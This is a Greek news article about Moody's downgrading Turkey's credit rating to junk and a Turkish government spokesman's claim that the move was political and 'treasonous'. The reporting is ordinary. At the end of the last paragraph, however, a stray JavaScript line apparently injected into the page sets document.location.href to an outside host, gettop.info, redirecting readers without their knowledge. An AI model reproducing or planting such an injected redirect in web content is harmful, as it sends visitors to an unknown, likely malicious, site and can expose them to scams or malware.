«Προδοτικές» απόπειρες υπονόμευσης η υποβάθμιση της Τουρκίας από τον Moody’s σε junk

0
3

 

Ο οίκος Moody’s προχώρησε αργά την Παρασκευή στην υποβάθμιση της πιστοληπτικής αξιολόγησης της Τουρκίας επικαλούμενος τις ανησυχίες για το κράτος δικαίου μετά το αποτυχημένο πραξικόπημα και τους κινδύνους για επιβράδυνση της οικονομίας.

Ως αποτέλεσμα υπήρξε η έντονη αντίδραση του βασικού εκπροσώπου της τουρκικής κυβέρνησης, ο οποίος επιτέθηκε στον οίκο αξιολόγησης μετά την υποβάθμιση της πιστοληπτικής ικανότητας της Τουρκίας στην κατηγορία των «σκουπιδιών» (junk), λέγοντας ότι η απόφαση ήταν πολιτική και ότι η Τουρκία αντιτίθεται σε «προδοτικές» απόπειρες υπονόμευσης της οικονομίας της.

Ο αντιπρόεδρος της τουρκικής κυβέρνησης Νουμάν Κουρτουλμούς, που είναι ο βασικός εκπρόσωπός της, δήλωσε σε συνέντευξη Τύπου ότι η οικονομική πολιτική της Τουρκίας παραμένει σε σωστό δρόμο.

Ο Κουρτουλμούς, που μίλησε σε δημοσιογράφους μετά τη συνεδρίαση του υπουργικού συμβουλίου, δήλωσε ότι η καλή διαχείριση της οικονομίας της Τουρκίας μετά το αποτυχημένο πραξικόπημα της 15ης Ιουλίου αντιστάθμισε τους κινδύνους και ότι οι μακροοικονομικοί δείκτες έκτοτε έχουν υπάρξει σταθεροί.

Ο Κουρτουλμούς πρόσθεσε ότι μετά την απόφαση του Moody’s παρατηρείται μικρή μόνο εκροή κεφαλαίων και ότι θεωρεί μακρινή την πιθανότητα επενδυτικών εκροών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here